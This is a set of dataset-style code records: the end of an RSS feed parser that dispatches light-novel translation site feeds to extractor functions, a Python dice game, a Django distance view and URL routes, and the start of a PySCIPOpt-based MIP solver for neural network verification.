: pfuncs_v_other.extract一期一会万歳,\n\t\t\t\t'天才創造すなわち百合' : pfuncs_v_other.extract天才創造すなわち百合,\n\t\t\t\t'睡眠中毒' : pfuncs_v_other.extract睡眠中毒,\n\t\t\t\t'輝く世界' : pfuncs_v_other.extract輝く世界,\n\t\t\t\t'12 Superlatives' : pfuncs_v_other.extract12Superlatives,\n\t\t\t\t'1HP' : pfuncs_v_other.extract1HP,\n\t\t\t\t'77 Novel' : pfuncs_v_other.extract77Novel,\n\t\t\t\t'7 Days Trial' : pfuncs_v_other.extract7DaysTrial,\n\t\t\t\t'87 Percent Translation' : pfuncs_v_other.extract87Percent,\n\n\n\n\t\t\t\t# Recently added.\n\n\t\t\t\t'Alternative Projects' : pfuncs_a_g.extractAlternativeProjects,\n\t\t\t\t'Apollo Translations' : pfuncs_a_g.extractApolloTranslations,\n\t\t\t\t'Elemental Cobalt' : pfuncs_a_g.extractElementalCobalt,\n\t\t\t\t'Hiohbye Translations' : pfuncs_h_n.extractHiohbyeTranslations,\n\t\t\t\t'levitytales.com' : pfuncs_h_n.extractLevityTales,\n\t\t\t\t'Levity Tales' : pfuncs_h_n.extractLevityTales,\n\t\t\t\t'Light Novel Cafe' : pfuncs_h_n.extractLightNovelCafe,\n\t\t\t\t'Myoniyoni Translations' : pfuncs_h_n.extractMyoniyoniTranslations,\n\t\t\t\t'No Name Translations' : pfuncs_h_n.extractNoNameTranslations,\n\t\t\t\t'Noob Mtl' : pfuncs_h_n.extractNoobMtl,\n\t\t\t\t'Novels&Chill' : pfuncs_h_n.extractNovelsChill,\n\t\t\t\t'Path of Translation' : pfuncs_o_u.extractPathOfTranslation,\n\t\t\t\t'Reincarnation Translations' : pfuncs_o_u.extractReincarnationTranslations,\n\t\t\t\t'Sakurane' : pfuncs_o_u.extractSakurane,\n\t\t\t\t'Soul Permutation' : pfuncs_o_u.extractSoulPermutation,\n\t\t\t\t'Torii Translations' : pfuncs_o_u.extractToriiTranslations,\n\t\t\t\t'Wums Translations' : pfuncs_v_other.extractWumsTranslations,\n\t\t\t\t'Xianxia Tales' : pfuncs_v_other.extractXianxiaTales,\n\t\t\t\t'Yami Translations' : pfuncs_v_other.extractYamiTranslations,\n\t\t\t\t'Zero Translations' : pfuncs_v_other.extractZeroTranslations,\n\n\t\t\t\t'Ananas Parfait' : pfuncs_a_g.extractAnanasParfait,\n\t\t\t\t'Anime, manga, translations' : pfuncs_a_g.extractAnimeMangaTranslations,\n\t\t\t\t'Ankou Translations' : pfuncs_a_g.extractAnkouTranslations,\n\t\t\t\t'Antheor' : pfuncs_a_g.extractAntheor,\n\t\t\t\t'Bo~' : pfuncs_a_g.extractBo,\n\t\t\t\t'Chaos Words' : pfuncs_a_g.extractChaosWords,\n\t\t\t\t'China Light Novel' : pfuncs_a_g.extractChinaLightNovel,\n\t\t\t\t'Chinese Novel Translated' : pfuncs_a_g.extractChineseNovelTranslated,\n\t\t\t\t'ChocolateCosmos Translations' : pfuncs_a_g.extractChocolateCosmosTranslations,\n\t\t\t\t'Datebayo Blog' : pfuncs_a_g.extractDatebayoBlog,\n\t\t\t\t'Daupao' : pfuncs_a_g.extractDaupao,\n\t\t\t\t'Deep Azure Sky' : pfuncs_a_g.extractDeepAzureSky,\n\t\t\t\t'Demon Scorpion Translations' : pfuncs_a_g.extractDemonScorpionTranslations,\n\t\t\t\t'Dwrf TL' : pfuncs_a_g.extractDwrfTL,\n\t\t\t\t'ExMachina.Asia' : pfuncs_a_g.extractExMachinaAsia,\n\t\t\t\t'Fake Fruits Translations' : pfuncs_a_g.extractFakeFruitsTranslations,\n\t\t\t\t'fantasy-books.live' : pfuncs_a_g.extractFantasyBooksLive,\n\t\t\t\t'For Kalimdor!' 
: pfuncs_a_g.extractForKalimdor,\n\t\t\t\t'Forthemoney Translations' : pfuncs_a_g.extractForthemoneyTranslations,\n\t\t\t\t'Girly Novels' : pfuncs_a_g.extractGirlyNovels,\n\t\t\t\t'Heavens Justice Translation' : pfuncs_h_n.extractHeavensJusticeTranslation,\n\t\t\t\t'I Ballistic Bunnies' : pfuncs_h_n.extractIBallisticBunnies,\n\t\t\t\t'Idyllic Translations' : pfuncs_h_n.extractIdyllicTranslations,\n\t\t\t\t'Incarneous' : pfuncs_h_n.extractIncarneous,\n\t\t\t\t'Jen Press Translation' : pfuncs_h_n.extractJenPressTranslation,\n\t\t\t\t'JeruTz\\'s Blog' : pfuncs_h_n.extractJeruTzsBlog,\n\t\t\t\t'JuJu Translation' : pfuncs_h_n.extractJuJuTranslation,\n\t\t\t\t'Kaguro Jp' : pfuncs_h_n.extractKaguroJp,\n\t\t\t\t'Kai\\'s Translations' : pfuncs_h_n.extractKaisTranslations,\n\t\t\t\t'Kencephalon Translations' : pfuncs_h_n.extractKencephalonTranslations,\n\t\t\t\t'Kirihara Maya' : pfuncs_h_n.extractKiriharaMaya,\n\t\t\t\t'Knight Fantastic Night Translations' : pfuncs_h_n.extractKnightFantasticNightTranslations,\n\t\t\t\t'Kudarajin' : pfuncs_h_n.extractKudarajin,\n\t\t\t\t'L3D' : pfuncs_h_n.extractL3D,\n\t\t\t\t'Laki\\'s Laboratory' : pfuncs_h_n.extractLakisLaboratory,\n\t\t\t\t'Land of Light Novels' : pfuncs_h_n.extractLandofLightNovels,\n\t\t\t\t'Leecher Vamparis Translations' : pfuncs_h_n.extractLeecherVamparisTranslations,\n\t\t\t\t'Legend of the Evil God' : pfuncs_h_n.extractLegendoftheEvilGod,\n\t\t\t\t'Legions Realm' : pfuncs_h_n.extractLegionsRealm,\n\t\t\t\t'Light Novels World' : pfuncs_h_n.extractLightNovelsWorld,\n\t\t\t\t'Loathsome Translations' : pfuncs_h_n.extractLoathsomeTranslations,\n\t\t\t\t'Luminstia' : pfuncs_h_n.extractLuminstia,\n\t\t\t\t'Mage Life' : pfuncs_h_n.extractMageLife,\n\t\t\t\t'Magictrans' : pfuncs_h_n.extractMagictrans,\n\t\t\t\t'Martial Dao' : pfuncs_h_n.extractMartialDao,\n\t\t\t\t'Misty Cloud Translations' : pfuncs_h_n.extractMistyCloudTranslations,\n\t\t\t\t'Mountain of Pigeons Translations' : pfuncs_h_n.extractMountainofPigeonsTranslations,\n\t\t\t\t'MT Novels' : pfuncs_h_n.extractMTNovels,\n\t\t\t\t'MyEngTranslation' : pfuncs_h_n.extractMyEngTranslation,\n\t\t\t\t'Nadenadeshitai' : pfuncs_h_n.extractNadenadeshitai,\n\t\t\t\t'Nex Serus' : pfuncs_h_n.extractNexSerus,\n\t\t\t\t'Pengu Taichou' : pfuncs_o_u.extractPenguTaichou,\n\t\t\t\t'Polar Bear Catcher' : pfuncs_o_u.extractPolarBearCatcher,\n\t\t\t\t'Poor Quality Translations' : pfuncs_o_u.extractPoorQualityTranslations,\n\t\t\t\t'Pumlated' : pfuncs_o_u.extractPumlated,\n\t\t\t\t'Rainbow Turtle Translations' : pfuncs_o_u.extractRainbowTurtleTranslations,\n\t\t\t\t'Ries Translations' : pfuncs_o_u.extractRiesTranslations,\n\t\t\t\t'Rinvelt House' : pfuncs_o_u.extractRinveltHouse,\n\t\t\t\t'Rogue Apple' : pfuncs_o_u.extractRogueApple,\n\t\t\t\t'Rotten Translations' : pfuncs_o_u.extractRottenTranslations,\n\t\t\t\t'Sabishi desu!!' 
: pfuncs_o_u.extractSabishiDesu,\n\t\t\t\t'sabishidesu.tk' : pfuncs_o_u.extractSabishiDesu,\n\t\t\t\t'Sekai no Kuroba' : pfuncs_o_u.extractSekainoKuroba,\n\t\t\t\t'Shalvation Translations' : pfuncs_o_u.extractShalvationTranslations,\n\t\t\t\t'Shameless Onii-san' : pfuncs_o_u.extractShamelessOniisan,\n\t\t\t\t'Shine Translation' : pfuncs_o_u.extractShineTranslation,\n\t\t\t\t'Shouldnt be here blog' : pfuncs_o_u.extractShouldntbehereblog,\n\t\t\t\t'Shova Translations' : pfuncs_o_u.extractShovaTranslations,\n\t\t\t\t'Silkpants Entente' : pfuncs_o_u.extractSilkpantsEntente,\n\t\t\t\t'SnowTime Translations' : pfuncs_o_u.extractSnowTimeTranslations,\n\t\t\t\t'Steady Translation' : pfuncs_o_u.extractSteadyTranslation,\n\t\t\t\t'SunnyTranslations' : pfuncs_o_u.extractSunnyTranslations,\n\t\t\t\t'T&Q' : pfuncs_o_u.extractTandQ,\n\t\t\t\t'Tequila Mockingbard' : pfuncs_o_u.extractTequilaMockingbard,\n\t\t\t\t'The Boy Who Couldn\\'t Be A Hero' : pfuncs_o_u.extractTheBoyWhoCouldntBeAHero,\n\t\t\t\t'thepaperfictions.wordpress.com' : pfuncs_o_u.extractThePaperFictions,\n\t\t\t\t'Tokyo ESP Scans' : pfuncs_o_u.extractTokyoESPScans,\n\t\t\t\t'Unique Books' : pfuncs_o_u.extractUniqueBooks,\n\t\t\t\t'Warrior Writing' : pfuncs_v_other.extractWarriorWriting,\n\t\t\t\t'Wiggly Translation' : pfuncs_v_other.extractWigglyTranslation,\n\t\t\t\t'World of Hope' : pfuncs_v_other.extractWorldofHope,\n\t\t\t\t'World Turtle Translations' : pfuncs_v_other.extractWorldTurtleTranslations,\n\t\t\t\t'Yasashi Honyaku' : pfuncs_v_other.extractYasashiHonyaku,\n\t\t\t\t'Yeagdrasil' : pfuncs_v_other.extractYeagdrasil,\n\t\t\t\t'Your Majesty Please Calm Down' : pfuncs_v_other.extractYourMajestyPleaseCalmDown,\n\t\t\t\t'『書櫃』' : pfuncs_v_other.extract書櫃,\n\t\t\t\t'閒人 • O N L I N E' : pfuncs_v_other.extract閒人ONLINE,\n\n\n\n\n\n\n\n\n\n\n\t\t\t\t# Broken\n\t\t\t\t'Require: Cookie' : pfuncs_stub.extractNop,\n\n\n\t\t\t\t'Blue Phoenix' : pfuncs_a_g.extractBluePhoenix,\n\t\t\t\t'Demon Translations' : pfuncs_a_g.extractDemonTranslations,\n\t\t\t\t'Fantasy novels' : pfuncs_a_g.extractFantasyNovels,\n\t\t\t\t'HalfElementMaster Translation' : pfuncs_h_n.extractHalfElementMasterTranslation,\n\t\t\t\t'Love me if you dare' : pfuncs_h_n.extractLoveMeIfYouDare,\n\t\t\t\t'Mineral Water Translation' : pfuncs_h_n.extractMineralWaterTranslation,\n\t\t\t\t'Rinkage Translation' : pfuncs_o_u.extractRinkageTranslation,\n\t\t\t\t'Selkin Novel' : pfuncs_o_u.extractSelkinNovel,\n\t\t\t\t'Startling Surprises at Every Step' : pfuncs_o_u.extractStartlingSurprisesAtEveryStep,\n\t\t\t\t'Wish Upon A Hope' : pfuncs_v_other.extractWishUponAHope,\n\n\n\t\t}\n\n\n\n\n\t\t# ('Have Func', False), ('SourceName', 'sparklingdawnlights.blogspot.com'),\n\n\t\t# ('Have Func', False), ('SourceName', 'Zeonic'),\n\t\t# ('Have Func', False), ('SourceName', '「\\u3000」'),\n\t\t# ('Have Func', False), ('SourceName', '天才創造すなわち百合'),\n\n\t\t# 'n00btranslations.wordpress.com' : pfuncs.extractN00btranslations.wordpress.com,\n\t\t# 'omatranslations.wordpress.com' : pfuncs.extractOmatranslations.wordpress.com,\n\t\t# 'soaringtranslations.wordpress.com' : pfuncs.extractSoaringtranslations.wordpress.com,\n\t\t# 'solitarytranslation.wordpress.com' : pfuncs.extractSolitarytranslation.wordpress.com,\n\t\t# 'walkthejianghu.wordpress.com' : pfuncs.extractWalkthejianghu.wordpress.com,\n\n\n\t\tif item['srcname'] in funcMap:\n\t\t\tret = funcMap[item['srcname']](item)\n\t\telse:\n\t\t\tprint(\"No filter found for '%s'?\" % item['srcname'])\n\n\t\t# NanoDesu is annoying and makes their releases 
basically impossible to parse. FFFUUUUUu\n\t\tif \"(NanoDesu)\" in item['srcname'] and not ret:\n\t\t\treturn False\n\n\t\tif ret is None:\n\t\t\treturn False\n\n\t\tbad_starts = [\n\t\t\t('FeedProxy', 'Comment on '),\n\t\t\t(\"Krytyk's Translations\", 'By: '),\n\t\t\t('Prince Revolution!', 'By: '),\n\t\t\t('Blazing Translations', 'By: '),\n\t\t\t('Blazing Translations', 'Comment on '),\n\t\t\t('Aran Translations', 'Comment on '),\n\n\t\t]\n\n\t\tif (\n\t\t\t\t(flags.RSS_DEBUG or self.dbg_print) and\n\t\t\t\tself.write_debug and\n\t\t\t\tret is False and\n\t\t\t\tnot \"teaser\" in item['title'].lower() and\n\t\t\t\tnot \"Preview\" in item['tags']\n\t\t\t):\n\t\t\tvol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])\n\t\t\tif (vol or chp or frag) and not flags.RSS_DEBUG:\n\n\t\t\t\tif not any([(item['title'].startswith(bad) and item['srcname'] == src) for src, bad in bad_starts]):\n\t\t\t\t\twith open('rss_filter_misses-1.json', \"a\") as fp:\n\n\t\t\t\t\t\twrite_items = {\n\t\t\t\t\t\t\t\"SourceName\" : item['srcname'],\n\t\t\t\t\t\t\t\"Title\" : item['title'],\n\t\t\t\t\t\t\t\"Tags\" : list(item['tags']),\n\t\t\t\t\t\t\t\"Vol\" : False if not vol else vol,\n\t\t\t\t\t\t\t\"Chp\" : False if not chp else chp,\n\t\t\t\t\t\t\t\"Frag\" : False if not frag else frag,\n\t\t\t\t\t\t\t\"Postfix\" : postfix,\n\t\t\t\t\t\t\t\"Feed URL\" : item['linkUrl'],\n\t\t\t\t\t\t\t\"GUID\" : item['guid'],\n\t\t\t\t\t\t\t\"Have Func\" : item['srcname'] in funcMap,\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\t# fp.write(\"\\n==============================\\n\")\n\t\t\t\t\t\t# fp.write(\"Feed URL: '%s', guid: '%s'\" % (item['linkUrl'], item['guid']))\n\t\t\t\t\t\t# fp.write(\"'%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s'\\n\" % (item['srcname'], item['title'], item['tags'], vol, chp, frag, postfix, item['linkUrl']))\n\n\t\t\t\t\t\tfp.write(\"%s\" % (json.dumps(write_items, )))\n\t\t\t\t\t\tfp.write(\"\\n\")\n\n\t\tvol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])\n\t\tif self.dbg_print or flags.RSS_DEBUG:\n\t\t\t# False means not caught. None means intentionally ignored.\n\n\t\t\tif (\n\t\t\t\t\tret is False and\n\t\t\t\t\t(vol or chp or frag) and\n\t\t\t\t\tnot \"teaser\" in item['title'].lower()\n\t\t\t\t):\n\t\t\t\tprint(\"Missed:\")\n\t\t\t\tprint(\"\tSource: '%s'\" % (item['srcname'], ))\n\t\t\t\tprint(\"\tTitle: '%s'\" % (item['title'], ))\n\t\t\t\tprint(\"\tTags: '%s'\" % (item['tags'], ))\n\t\t\t\tprint(\"\tVol %s, chp %s, fragment %s, postfix '%s'\" % (vol, chp, frag, postfix))\n\t\t\t\t# print(\"Missed: '%s', '%s', '%s', '%s', '%s', '%s', '%s'\" % (item['srcname'], item['title'], item['tags'], vol, chp, frag, postfix))\n\t\t\telif ret:\n\t\t\t\tpass\n\t\t\t\t# print(\"OK! 
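# A minimal sketch of the dispatch-table pattern used in the record above; 'Site A'
# and parse_site_a are hypothetical names, and the explicit False fallback for unknown
# sources is an assumption about the intended behaviour ("False means not caught" in
# the record's own comments), which keeps the result bound for the checks that follow.
def parse_site_a(item):
    return {'vol': None, 'chp': 1, 'frag': None, 'postfix': '', 'tl_type': 'translated'}

FUNC_MAP = {'Site A': parse_site_a}

def dispatch(item):
    parser = FUNC_MAP.get(item['srcname'])
    if parser is None:
        print("No filter found for '%s'?" % item['srcname'])
        return False  # explicit fallback instead of leaving the result undefined
    return parser(item)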
'%s', V:'%s', C:'%s', '%s', '%s', '%s'\" % (ret['srcname'], ret['vol'], ret['chp'], ret['postfix'], ret['series'], item['title']))\n\t\t\telse:\n\t\t\t\tpass\n\t\t\t\t# print(\"Wat: '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s'\" % (item['srcname'], item['title'], item['tags'], vol, chp, frag, postfix, item['linkUrl']))\n\n\t\t\tif flags.RSS_DEBUG:\n\t\t\t\tret = False\n\n\t\t# Only return a value if we've actually found a chapter/vol\n\t\tif ret and not (ret['vol'] or ret['chp'] or ret['postfix']):\n\t\t\tself.log.info(\"Skipping item due to no chapter/vol/postfix: '%s', '%s', '%s', '%s', '%s', '%s', '%s'\", item['srcname'], item['title'], item['tags'], vol, chp, frag, postfix)\n\t\t\tret = False\n\n\t\t# Do not trigger if there is \"preview\" in the title.\n\t\tif 'preview' in item['title'].lower():\n\t\t\tself.log.info(\"Skipping item due to preview string: '%s', '%s', '%s', '%s', '%s', '%s', '%s'\", item['srcname'], item['title'], item['tags'], vol, chp, frag, postfix)\n\t\t\tret = False\n\t\tif ret:\n\t\t\tassert 'tl_type' in ret\n\n\n\n\t\treturn ret\n\n\n\tdef getProcessedReleaseInfo(self, feedDat):\n\n\t\tif any([item in feedDat['linkUrl'] for item in skip_filter]):\n\t\t\tprint(\"Skipping!\")\n\t\t\treturn\n\n\n\t\trelease = self.dispatchRelease(feedDat)\n\n\t\tif release:\n\t\t\tret = {\n\t\t\t\t'type' : 'parsed-release',\n\t\t\t\t'data' : release\n\t\t\t}\n\t\t\treturn json.dumps(ret)\n\t\treturn False\n\n\n\tdef getRawFeedMessage(self, feedDat):\n\n\t\tfeedDat = feedDat.copy()\n\n\t\t# remove the contents item, since it can be\n\t\t# quite large, and is not used.\n\t\tfeedDat.pop('contents')\n\t\tret = {\n\t\t\t'type' : 'raw-feed',\n\t\t\t'data' : feedDat\n\t\t}\n\t\ttry:\n\t\t\treturn json.dumps(ret)\n\t\texcept TypeError:\n\t\t\treturn None\n\n\t# Manual patches for dealing with a few broken feeds.\n\tdef checkIgnore(self, feedDat):\n\n\t\t# Japtem seems to put their comments in their main feed, for no good reason.\n\t\tif feedDat['srcname'] == \"Japtem\" and feedDat['title'].startswith(\"By: \"):\n\t\t\treturn True\n\t\tif feedDat['srcname'] == \"Zeonic\" and feedDat['title'].startswith(\"By: \"):\n\t\t\treturn True\n\t\tif feedDat['srcname'] == 'Sora Translations' and feedDat['title'].startswith(\"Comment on\"):\n\t\t\treturn True\n\n\n\t\treturn False\n\n\tdef processFeedData(self, feedDat, tx_raw=True, tx_parse=True):\n\n\t\tif any([item in feedDat['linkUrl'] for item in skip_filter]):\n\t\t\tprint(\"LinkURL '%s' contains a filtered string. Not fetching!\" % feedDat['linkUrl'])\n\t\t\treturn\n\n\n\t\tnetloc = urllib.parse.urlparse(feedDat['linkUrl']).netloc\n\n\t\tnicename = feedNameLut.getNiceName(feedDat['linkUrl'])\n\t\tif not nicename:\n\t\t\tnicename = netloc\n\t\tfeedDat['srcname'] = nicename\n\n\t\tif self.checkIgnore(feedDat):\n\t\t\treturn\n\n\t\t# print(\"ProcessFeedData! 
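# A minimal stand-alone sketch of the message-envelope pattern that getRawFeedMessage
# above uses; the field names mirror the record, everything else is illustrative.
import json

def raw_feed_message(feed_dat):
    payload = dict(feed_dat)       # copy so the caller's dict is left untouched
    payload.pop('contents', None)  # the contents field is large and unused downstream
    try:
        return json.dumps({'type': 'raw-feed', 'data': payload})
    except TypeError:              # non-serialisable values: drop the message
        return None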
\", netloc)\n\n\t\t# A bunch of crap is aggregated through the \"feedproxy.google.com\" netloc.\n\t\tif not WebMirror.rules.netloc_send_feed(netloc) and not \"feedproxy.google.com\" in netloc:\n\t\t\tprint(\"Not sending data for netloc: \", netloc)\n\t\t\treturn\n\n\t\ttry:\n\t\t\tnew = self.getProcessedReleaseInfo(feedDat)\n\t\texcept AssertionError:\n\t\t\tself.log.error(\"Exception when processing release!\")\n\t\t\tfor line in traceback.format_exc().split(\"\\n\"):\n\t\t\t\tself.log.error(line.rstrip())\n\n\t\t\treturn\n\n\t\tif tx_parse:\n\t\t\tif new:\n\t\t\t\tself.amqp_put_item(new)\n\n\n\t\traw = self.getRawFeedMessage(feedDat)\n\t\tif tx_raw:\n\t\t\tif raw:\n\t\t\t\tself.amqp_put_item(raw)\n","sub_path":"WebMirror/OutputFilters/rss/FeedDataParser.py","file_name":"FeedDataParser.py","file_ext":"py","file_size_in_byte":86086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"506327436","text":"from random import randint\n\ndef getdicevalue():\n # to get the value obtained on rolling the dice\n return randint(1,6) \n\nturns_taken = 1\ntotal_score = 0\nturn_score = 0\n\nprint(\"TURN 1\")\n\nwhile total_score<20:\n option_taken = input(\"Roll or hold? (r/h):\")\n\n if(option_taken=='r'):\n value_obtained = getdicevalue()\n print(\"Die: \",value_obtained)\n if(value_obtained==1):\n turn_score = 0\n turns_taken += 1\n print(\"Turn over. No score.\\n\\nTURN\",turns_taken)\n else:\n turn_score += value_obtained\n \n else:\n total_score += turn_score\n if(turn_score>20 or total_score>20):\n break\n print(\"Score for turn:\",turn_score,\"\\nTotal score:\",total_score)\n turns_taken += 1\n print(\"\\nTURN\",turns_taken)\n turn_score = 0\n \n if(turn_score>20 or total_score>20):\n break\n\n\nprint(\"You finished in\",turns_taken,\"turn/s!\\nGame Over!\")\n\n\n","sub_path":"Session01/pig.py","file_name":"pig.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"11262386","text":"from django.shortcuts import render\nfrom math import sin, cos, sqrt, atan2, radians\n\n# Create your views here.\n\ndef distance(request):\n OLat = -4.252606\n OLong = 15.232513\n DLat = -4.153139\n DLong = 15.270116\n p1 = [OLat, OLong]\n p2 = [DLat, DLong]\n # distance = math.sqrt( ((p1[0]-p2[0])**2)+((p1[1]-p2[1])**2) )\n \n R = 6373.0\n\n lat1 = radians(OLat)\n lon1 = radians(OLong)\n lat2 = radians(DLat)\n lon2 = radians(DLong)\n\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n\n a = sin(dlat / 2)**2 + cos(lat1) * cos(lat2) * sin(dlon / 2)**2\n c = 2 * atan2(sqrt(a), sqrt(1 - a))\n\n distance = R * c\n\n \n\n return render(request, 'index.html', locals())\n","sub_path":"course/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"523087957","text":"from django.conf.urls import url\n\nfrom . 
import views\n\nurlpatterns = [\n    url(r'^$', views.web_index, name='index'),\n    url(r'^main$', views.web_main, name='main'),\n    url(r'^upload$', views.web_upload_file, name='upload'),\n    url(r'^status$', views.web_status, name='status'),\n    url(r'^check$', views.web_check, name='check'),\n    url(r'^collocations$', views.web_collocations, name='collocations')\n]\n","sub_path":"src/web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"379302024","text":"from pyscipopt import Model, quicksum, SCIP_PROPTIMING, SCIP_PRESOLTIMING, SCIP_EVENTTYPE, SCIP_HEURTIMING\nimport networkx as nx\nfrom collections import OrderedDict\nfrom relu_branching import ReluBranching\nfrom domain_branching import DomainBranching\nfrom sampling_heuristic import SamplingHeuristic\nfrom utils import bfs_dist\nfrom lb_event import LbChangeEvent\nfrom dualbound_event import DualBoundEvent\nimport torch.nn\nfrom compute_bounds import BoundComp\nfrom collections import namedtuple\nfrom relu_sepa import ReluSepa\n\n\nclass MIPwithBounds:\n    \"\"\"Base class of our solver implementation. Contains most data structures and is used to include the\n    different components such as separators, branching rules, propagators. \"\"\"\n    \n    def __init__(self, filepath, eps):\n        self.model = Model(\"\")\n        self.vars = {}\n        self.eps = eps\n        self.filepath = filepath\n        self.graph = nx.DiGraph()\n        self.relu_nodes = {}\n        self.relu_in_nodes = {}\n        self.fixed_positive = {}\n        self.fixed_negative = {}\n        self.relu_cons = {}\n        self.max_pool_nodes = {}\n        self.linear_nodes = {}\n        self.input_nodes = {}\n        self.binary_variables = {}\n        self.nodes_sorted = []\n        self.layers = [] # list of sets, each set represents one layer, sets contain variable names (str)\n        self.node_position_pytorch = {} # maps neuron names to layer number and index in layer in the pytorch model\n        # values are tuples of ints (layer, )\n        self.delete_cons = []\n        self.output_cons = []\n        self.output_variables = {} # dict of those variable names, which are introduced for the optimization mode,\n        # except self.objective_variable\n        self.output_variables_binary = [] # list of the binary vars for the output, these vars are ALSO in self.binary_vars\n        self.verify_or_constraints = False\n        self.objective_variable = None\n        self.nodes_by_branch_prio = {} # dict {scip_node_number: possible branch Relus}\n        self.pytorch_model = None\n        self.dualbound_hdlr_feas = None\n        self.dualbound_hdlr_infeas = None\n        self.local_search_hdlr = None\n        self.debug_bound_hdlr = None\n        self.bound_comp = None\n\n\n    def add_cons_relu_linear(self, x, y):\n        \"\"\"Add linear approximation of a ReLU constraint as in Ehlers (2017).\n\n        Args:\n            x: input variable\n            y: output variable, lower bound of this variable should be 0\n            lb: float, lower bound\n            ub: float, upper bound\n        \"\"\"\n\n        self.model.addCons(y >= x)\n        ub = x.getUbGlobal()\n        lb = x.getLbGlobal()\n        factor = ub / (ub - lb)\n        if lb <= 0 and ub >= 0:\n            self.delete_cons.append(self.model.addCons(y + lb * factor <= x * factor))\n\n\n    def add_cons_maxpool_linear(self, X, y, lbs, name):\n        \"\"\"Add linear approximation of a max pool constraint as in Ehlers (2017).\n\n        Args:\n            X: list of input variables\n            y: output variable, lower bound should be -inf\n            lbs: list of float, lower bounds of the input variables\n        \"\"\"\n\n        self.delete_cons.append(self.model.addCons(quicksum(_x for _x in X) >= y + sum(lbs) - max(lbs),\n                                                   name=name + \"_lin_approx\"))\n        for _x in X:\n
            self.model.addCons(y >= _x, name=name + \"_lb\")\n\n    \n    \n    def add_cons_maxpool(self, X, y, M, name, use_bound_disj=False, use_mip=True):\n        \"\"\"Add a max pool constraint to self.model, i.e. constraint y = max(X)\n        \n        Args:\n            self.model: instance of pyscipopt Model\n            X: list of input variables\n            y: output variable, lower bound should be -inf (unless all inputs are >= 0)\n            M: upper bound on all input variables\n        \"\"\"\n        \n        if use_bound_disj:\n            num = len(X)\n            a = [self.model.addVar(lb=None) for _ in range(num)]\n            for _a, _x in zip(a, X):\n                self.model.addCons(_a == _x - y)\n                self.model.addCons(y >= _x)\n            \n            self.model.addConsBoundDisjunction(a, [\"lb\" for _ in range(num)], [0 for _ in range(num)])\n\n        if use_mip:\n            assert name\n            print(\"add maxpool\", X, y, M)\n            d_vars = []\n            for i, _x in enumerate(X):\n                self.model.addCons(y >= _x, name=name + \"_lb_\" + _x.name)\n                _d = self.model.addVar(ub=1, vtype=\"B\", name=\"bin_\" + name + \"_\" + _x.name)\n                self.model.addCons(y <= _x + (M - _x.getLbGlobal()) * (1 - _d), name=name + \"_bin_ub_\" + _x.name)\n                d_vars.append(_d)\n                self.binary_variables[\"bin_\" + name + \"_\" + _x.name] = _d\n                self.output_variables_binary.append(_d)\n\n            self.model.addCons(1 == quicksum(_d for _d in d_vars), name=name + \"_sum\")\n\n\n\n    def compute_linear_bounds(self, variables, coefficients, local=False):\n        \"\"\"Compute the upper and lower bound before the ReLU application to the given variables with the\n        corresponding coefficients. If lower bound >= 0 or upper bound <= 0, then the phase of the ReLU\n        can be fixed.\n\n        Args:\n            variables: list of str, containing the names of the variables\n            coefficients: list of float coefficients\n            local: bool, if True local bounds are used, otherwise global bounds\n\n        Returns:\n            tuple: (lower bound, upper bound)\n        \"\"\"\n\n        assert len(variables) == len(coefficients)\n\n        lb, ub = 0, 0\n        for v, c in zip(variables, coefficients):\n            v = self.vars[v]\n            if local:\n                current_lb = v.getLbLocal()\n                current_ub = v.getUbLocal()\n            else:\n                current_lb = v.getLbGlobal()\n                current_ub = v.getUbGlobal()\n\n            if c > 0:\n                ub += current_ub * c\n                lb += current_lb * c\n            elif c < 0:\n                ub += current_lb * c\n                lb += current_ub * c\n\n\n        return lb, ub\n\n\n    def quicksum_coeff_var(self, elements):\n        return quicksum(c * v for v, c in zip(*self.get_vars_and_coefficients(elements)))\n\n    def quicksum_from_var_names(self, variable_names, coeffs):\n        return quicksum(c * self.vars[v] for v, c in zip(*(variable_names, coeffs)))\n\n    def get_vars_and_coefficients(self, elements, start=3, str_only=False):\n        \"\"\"Use a list which comes from line.split() to create lists of float coefficients and SCIP variables.\"\"\"\n        if str_only:\n            return [var for var in elements[start + 1::2]], [float(coeff) for coeff in elements[start::2]]\n        else:\n            return [self.vars[var] for var in elements[start + 1::2]], [float(coeff) for coeff in elements[start::2]]\n\n\n    def read_file_into_graph(self):\n        \"\"\"Read the input file and add all neurons to self.graph. 
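# compute_linear_bounds above is plain interval arithmetic over an affine expression;
# the same rule as a free-standing function, with made-up example bounds (this is an
# illustration of the rule, not part of the solver):
def interval_bounds(bounds, coeffs, bias=0.0):
    # bounds: list of (lb, ub) per input variable; returns bounds of bias + sum(c * x).
    lb = ub = bias
    for (l, u), c in zip(bounds, coeffs):
        if c > 0:
            lb += c * l
            ub += c * u
        else:
            lb += c * u
            ub += c * l
    return lb, ub

# x1 in [-1, 2], x2 in [0, 3]: the expression 2*x1 - x2 + 1 lies in [-4, 5].
assert interval_bounds([(-1, 2), (0, 3)], [2.0, -1.0], 1.0) == (-4.0, 5.0)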
